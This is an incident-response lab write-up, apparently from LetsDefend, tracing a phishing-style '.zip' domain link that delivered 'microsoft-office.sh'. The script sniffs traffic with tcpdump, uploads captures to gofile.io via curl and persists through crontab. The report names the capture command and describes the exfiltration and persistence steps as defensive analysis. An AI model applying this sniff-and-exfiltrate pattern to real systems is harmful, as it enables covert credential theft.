Investigate

Phishing
zip Domain
As Incident Responder
 CONTENTS
TABLE OF
3 ALERT

4 VERIFY

7 ANALYSIS - INITIAL ACCESS

12 PERSISTENCE

14 PRIVILEGE ESCALATION

14 CREDENTIAL ACCESS

18 CONTAINMENT

19 SUMMARY

20 LESSON LEARNED

21 MITRE ATT&CK

AUTHOR: BERKAY SOYLU

 letsdefend.io

ALERT
Based on the information that the alert provided, it appears that there are
some suspicious commands executed on a Linux system named "Billy" with
an IP address of 172.16.17.193. The Alert is triggered by the SOC198 rule for
Network Sniffer Detected.

The L1 analyst observed that the suspicious command ran from a sh file and
the file path is identified as:
“/home/billy/programs/microsoft-office.sh”

The device action is marked as "allowed", indicating that no action was

taken by the device to prevent or block the execution of the file.

The device action is marked as "allowed", indicating that no action was

taken by the device to prevent or block the execution of the file.

Legal names may be used by adversaries to disguise their files.

Based on the provided trigger reason, the potential network sniffing activity
via use of network tools such as 'tshark', 'tcpdump' have been seen. As noted
by the L1 analyst, Billy visited a website, and some of Billy’s credentials were
accessed after the incident.
 letsdefend.io

VERIFY
As an incident responder, one of the first steps we take to verify the alert and
determine whether it is a false positive or a true positive incident is to
analyze the logs collected from the host by our security products.

The first step we can take to investigate the hash value of the suspicious file
is to use online threat intelligence platforms such as VirusTotal, Hybrid
Analysis, and MalwareBazaar.

Based on the information provided by VirusTotal, it appears that the file has
been flagged as benign by 58 antivirus engines. There is a warning in the
"Code Insight" section regarding possible malicious use of the script, such as
capturing network traffic for surveillance or stealing sensitive information.

VirusTotal Code Insight analyzes potentially harmful files to explain their

(malicious) behavior, and it will improve the ability to identify which of them
pose actual threats.

Therefore, we analyzed the file using VirusTotal, which revealed that the sh
code contains suspicious functions, such as capturing network traffic and
uploading the pcap to gofile.io. Since the file also alerted our network sniffer
rule, it is possible that the sh file is acting as spyware and trojan.
 letsdefend.io

We can proceed with connecting to the host machine for further analysis.
This can easily be done from the Endpoint Security tab by searching for the
hostname or IP address and clicking the “Connect” button.

We have identified that the suspicious file is located in the programs folder
in alert details. When we checked the related path, we found that the file
still exists.

We can use “sha256sum” command for getting the hash of the file and
crosscheck it with the hash from alert details.

We have identified the file successfully and verified it by cross-checking

hashes.

Now that we have determined that the file is malicious, the next step is to
investigate whether the file has been executed on the host system. To do
this, we can check the Process List from the Endpoint Security tab to see if
the file has been run on the system. Looking at running processes is a quick
and straightforward method for identifying any execution trace of the file.
 letsdefend.io

As seen above, the sh file has been run on the host with sudo privileges,
from Billy’s bash shell. This proves microsoft-office.sh file has been executed
on the system.

Based on our analysis, we have confirmed that the alert is a true positive
(TP), and the labeled "Trojan-Spyware" malware has been executed on the
system. This incident warrants further investigation and an appropriate
response.
 letsdefend.io

ANALYSIS
Initial Access

The presence of malicious files on the computer should make us think about
initial access. It is crucial to investigate the initial access point of the attacker
in order to determine how they were able to gain unauthorized access to
the system.

To begin our investigation, we will review the all logs we gathered from our
security products and cross-reference them with the information we
gathered from the alert page. The alert creation time will be a key reference
for us to investigate the incident.

On the email security tab, we can simply filter the username to see what
emails Billy received or sent.
 letsdefend.io

It can be seen that Bella sent an email to Billy on May 17 at 08:42 AM.
In the context of the email; Bella, the sender, contacts Billy regarding the
installation of Microsoft Office suite. Bella instructs Billy to download the zip
file she sends. We can see there is an attachment named microsoft-
office[.]zip in the email.

Although this email may appear suspicious, upon downloading and

analyzing the attached file, we actually see that the attachment is different
from the file that triggered the alarm.

It is actually revealed that the file is a legally signed document by Microsoft,

and it is flagged as benign on VT (VirusTotal).
 letsdefend.io

Upon careful analysis of the email, it becomes evident that the text
"Microsoft-Office[.]zip" is automatically converted into a clickable link due to
the introduction of newly announced [.]zip top-level domains (TLDs).

The email client's formatting automatically treats it as a hyperlink. Therefore,

the font formatting causes it to appear as a clickable link.

However, if a threat actor owned a [.]zip domain with the same name as a
linkified filename, a person may mistakenly visit the site and fall for a
phishing scam or download malware, thinking the URL is safe because it
came from a trusted source. Further details can be found at:
https://www.bleepingcomputer.com/news/security/new-zip-domains-spark-
debate-among-cybersecurity-experts/
 letsdefend.io

On the Endpoint security “Browser History” tab it is seen that the

microsoft_office[.]zip address was visited on 2023-05-17 09:02:51. The creation
of the alert corresponds to the visit of the related address.

When we checked the related URL on online threat intelligence sources, it

was observed that the URL is malicious.

When examining the IP addresses contacted in the Network Action tab, we

noticed some suspicious IP addresses that were communicated with during
the relevant time.

Additionally, it has been observed that some of the contacted IP addresses

are also identified as malicious.
 letsdefend.io

When we navigate to the Log Management tab and filter the IP address of
the Billy host device, we were able to view the logs generated during the
relevant time.

It has been confirmed that the Microsoft-office[.]zip URL was resolved to the
visited malicious IP address, and furthermore, the Microsoft-office.sh file,
which caused the alarm on the device, was downloaded through this URL.

Our investigation has revealed that the microsoft-office.sh file was

downloaded from the microsoft-office[.]zip URL to the compromised system.
Based on the analysis, the initial infection vector was a malicious URL that
the user clicked on. It can be concluded that the user downloaded the file
and executed it.

Upon further investigation, it is discovered that the initial compromise was

achieved through a Drive By Compromise that enabled the attackers to gain
access to the host machine.
 letsdefend.io

Persistence

Once an attacker gains initial access, they may try to establish persistence to
ensure continued access to the system or network, even if their initial access
is discovered and removed.

Once we have confirmed the presence of the malware, our next step should
be to investigate any potential persistence by the attacker.

To fully understand how the potential threat operates, it is important to

analyze the code within the .sh file. This will help identify how the malware
ensures persistence on the system. By doing this, we can make sure that all
parts of the threat are removed later.

After analyzing the code, it appears that the script:

It captures network traffic for a duration of 30 seconds using tcpdump.

After capturing the network traffic, it uploads the resulting pcap file to
gofile.io.
The link to the uploaded file is extracted from the upload response.
The extracted link is appended to a file named "cap.log".
Finally, the script is configured to run at boot time by adding the related
line to the crontab.
 letsdefend.io

This script is likely to be used for malicious purposes, such as capturing

network traffic for surveillance or to steal sensitive information. In the
endpoint security tab, we can also see that the crontab command ran.

The details of the process also prove that the malicious microsoft-office.sh
script ensures persistence on the host by creating a crontab.

When examining the crontabs of the host belonging to Billy, we have

identified the malicious script.

Based on our analysis, we have identified that the malware used the
Scheduled Task/Job technique to remain persistent on the host machine.
 letsdefend.io

Privilege Escalation
We reviewed system logs, analyzed running processes, and checked for any
suspicious system changes, but did not find any evidence of attempts to
gain elevated access or escalate privileges.
Based on the analysis there were no privilege escalation indicators.

Credential Access

As part of our incident response investigation, we should carefully analyze

the system's activity logs and find evidence of credential access. This is a
critical area of concern, as the compromise of sensitive credentials can lead
to further data breaches, unauthorized access, and potential financial losses.

To start our analysis, investigate any potential credential access - data

collection by the attacker. To do this we can start by analyzing the processes
of malware on “Endpoint Security” > “Processes” section.

When examining the process logs of the host named Billy, a relevant
tcpdump process record that caused the triggering of the alarm can be
observed.
 letsdefend.io

The command tcpdump -w outfile.pcap -G 30 itself is not inherently

dangerous or malicious. tcpdump is a widely used command-line packet
analyzer tool for capturing and analyzing network traffic.
However, when used inappropriately or without proper authorization,
tcpdump can pose a security risk, particularly in the context of credential
access and network sniffing.

If an attacker gains unauthorized access to a system and executes tcpdump,

they can potentially capture network traffic that contains sensitive
information, such as usernames, passwords, or other authentication
credentials. By analyzing the captured packets, an attacker may be able to
extract and exploit these credentials. This is one of the “Credential Access”
techniques.

When accessing the relevant directory on the device, we can observe that
the pcap file has been extracted there.
 letsdefend.io

When examining the processes running on the host again, we can observe
that the relevant outfile.pcap file was exfiltrated to a site called "gofile" using
the curl command.

For a detailed analysis, we can check Log Management for the logs that are
collected by the network products.

Overall, analyzing the network logs and firewall logs can provide valuable
insights into the behavior of the malware on the host machine, and can
help us determine the scope and impact of the incident.

Based on the raw log, we can see that the process microsoft-office.sh
attempted to connect to the domain store5.gofile.io via POST method, and
the device permitted this action. This indicates that the outfile.pcap
exfiltrated to the gofile.io website.
 letsdefend.io

The requested URL information in the raw logs are given in the table below:

When analyzing the cap.log file on the device, it reveals a link corresponding
to the exfiltrated relevant file.

When visiting the relevant site, it can be observed that the outfile.pcap file
has been exfiltrated to the internet in a public manner.

Based on our analysis, we have identified that the attacker used the
Network Sniffing technique.
 letsdefend.io

CONTAINMENT
Based on the information gathered during the investigation, it is highly
likely that the system has been compromised. To prevent further data loss
or unauthorized access, it is recommended to isolate the system from the
network immediately.

After the containment we can close the alert from the investigation channel.
 letsdefend.io

SUMMARY
The incident was triggered by an alert indicating network sniffing activity.
The alert pointed to suspicious commands executed on a Linux system
named "Billy" with the IP address 172.16.17.193. The SOC198 rule for Network
Sniffer Detected triggered the alert.

Our investigation uncovered that the system was initially compromised

through a malicious URL in the form of a Microsoft-Office[.]zip file. Without
realizing it, the user clicked on this URL within a legitimate email sent by
Bella. The email client's formatting treated the [.]zip file as a hyperlink,
making it appear as a clickable link due to font formatting. This exploit
cleverly took advantage of the introduction of new [.]zip top-level domains
(TLDs), which automatically turned "Microsoft-Office[.]zip" into a clickable
link, ultimately leading to a drive-by compromise.

In terms of persistence, our analysis revealed that a malicious script was

configured to run at boot time by adding it to the crontab. This technique,
known as Scheduled Task/Job, allowed the malware to maintain persistence
on the compromised host.

Regarding credential access, we discovered that the script utilized tcpdump

to capture network traffic for a period of 30 seconds. The captured network
traffic was then uploaded to gofile.io, with the link to the uploaded file
extracted from the upload response. The extracted link was appended to a
file named "cap.log." The attacker employed the Network Sniffing technique
(T1040), enabling them to intercept network traffic containing sensitive
information, including usernames, passwords, and other authentication
credentials.
It is important to note that there were no indicators of privilege escalation.

The incident highlights the successful exploitation of [.]zip url and network
sniffing techniques to collect sensitive data. Immediate actions should be
taken to mitigate the impact, including isolating the affected system,
conducting a thorough analysis of compromised credentials, and
implementing additional security measures to prevent similar incidents in
the future.
 letsdefend.io

LESSON
LEARNED
Downloading and executing unknown scripts from the internet can be
risky and potentially harmful. It is important to only download files from
trusted sources.

It is important to keep all software up-to-date to reduce the risk of being

vulnerable to known exploits

Even if links come from trusted sources, it is still necessary to verify them.

REMEDIATION
ACTIONS
Delete the malicious crontab.

Delete Associated Files and Folders related to the script from the host
machine.

Isolate the compromised machine from the network to prevent the

attacker from accessing other resources and systems within the
organization.
 letsdefend.io

MITIGATION
ACTIONS
Block dangerous, top abused TLDs from your network.

MITRE ATT&CK
 letsdefend.io

ARTIFACTS